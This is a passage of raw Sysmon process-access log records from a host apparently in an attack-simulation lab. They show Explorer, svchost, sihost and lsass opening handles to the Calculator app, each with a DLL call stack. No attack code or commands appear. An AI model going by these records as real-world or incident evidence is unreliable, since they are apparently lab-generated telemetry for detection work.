Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360666Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.358{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360665Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.358{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360664Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.343{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+78223|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360663Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.343{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.pcshell.dll+1aaef|C:\Windows\system32\twinui.pcshell.dll+1a252|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360662Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.343{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\TWINAPI.dll+6cd1|C:\Windows\system32\twinui.pcshell.dll+1aa50|C:\Windows\system32\twinui.pcshell.dll+1a252|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360661Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.343{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360660Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.343{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360659Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.343{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360658Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.343{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360657Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.343{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\TWINAPI.dll+6cd1|C:\Windows\system32\twinui.pcshell.dll+1aa50|C:\Windows\system32\twinui.pcshell.dll+1a252|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360656Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.343{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\TWINAPI.dll+6cd1|C:\Windows\system32\twinui.pcshell.dll+1aa50|C:\Windows\system32\twinui.pcshell.dll+1a252|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360655Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.343{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+2321e|C:\Windows\SYSTEM32\psmserviceexthost.dll+201f5|C:\Windows\SYSTEM32\psmserviceexthost.dll+1e830|C:\Windows\SYSTEM32\psmserviceexthost.dll+1d6ee|C:\Windows\SYSTEM32\psmserviceexthost.dll+264d5|C:\Windows\SYSTEM32\psmserviceexthost.dll+36ee2|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360654Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.327{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7d4e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ca7|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+299b|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f 10341000x8000000000000000360653Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.327{8e433fbf-337a-6013-7402-000000001100}62681424C:\Windows\system32\sihost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\usermgrcli.dll+112d|C:\Windows\system32\activationmanager.dll+f9dd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e 10341000x8000000000000000360652Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.327{8e433fbf-2a44-6013-0e00-000000001100}7129148C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+2321e|C:\Windows\SYSTEM32\psmserviceexthost.dll+201f5|C:\Windows\SYSTEM32\psmserviceexthost.dll+1e830|C:\Windows\SYSTEM32\psmserviceexthost.dll+1d6ee|C:\Windows\SYSTEM32\psmserviceexthost.dll+264d5|C:\Windows\SYSTEM32\psmserviceexthost.dll+36ee2|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360651Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.327{8e433fbf-2a44-6013-0e00-000000001100}7129148C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+33e55|C:\Windows\SYSTEM32\psmserviceexthost.dll+11fea|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360650Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.327{8e433fbf-337b-6013-8402-000000001100}16563520C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+4988e|C:\Windows\system32\twinui.pcshell.dll+4b3da|C:\Windows\system32\twinui.pcshell.dll+38af2|C:\Windows\system32\twinui.pcshell.dll+6fe9c|C:\Windows\System32\shcore.dll+b0b7|C:\Windows\system32\twinui.pcshell.dll+1dc45|C:\Windows\system32\twinui.pcshell.dll+623cb|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931 10341000x8000000000000000360649Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.327{8e433fbf-337a-6013-7402-000000001100}62682592C:\Windows\system32\sihost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\activationmanager.dll+cd0b|C:\Windows\system32\activationmanager.dll+c217|C:\Windows\system32\activationmanager.dll+bd76|C:\Windows\system32\activationmanager.dll+129de|C:\Windows\system32\activationmanager.dll+25a83|C:\Windows\system32\activationmanager.dll+9593|C:\Windows\system32\activationmanager.dll+54b7|C:\Windows\system32\activationmanager.dll+4591|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8 10341000x8000000000000000360648Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.311{8e433fbf-2a44-6013-0e00-000000001100}71210564C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+37ea0|C:\Windows\SYSTEM32\psmserviceexthost.dll+38b65|C:\Windows\SYSTEM32\psmserviceexthost.dll+25e9b|C:\Windows\SYSTEM32\psmserviceexthost.dll+2948a|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360647Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.311{8e433fbf-2a44-6013-0e00-000000001100}71210564C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+28d18|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360646Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.311{8e433fbf-2a44-6013-0e00-000000001100}71210564C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+2321e|C:\Windows\SYSTEM32\psmserviceexthost.dll+201f5|C:\Windows\SYSTEM32\psmserviceexthost.dll+1e830|C:\Windows\SYSTEM32\psmserviceexthost.dll+1d6ee|C:\Windows\SYSTEM32\psmserviceexthost.dll+264d5|C:\Windows\SYSTEM32\psmserviceexthost.dll+36ee2|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360645Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.171{8e433fbf-2a44-6013-0c00-000000001100}9804888C:\Windows\system32\lsass.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\lsasrv.dll+1792a|C:\Windows\system32\lsasrv.dll+184bf|C:\Windows\system32\lsasrv.dll+17783|C:\Windows\SYSTEM32\SspiSrv.dll+1a72|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360644Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 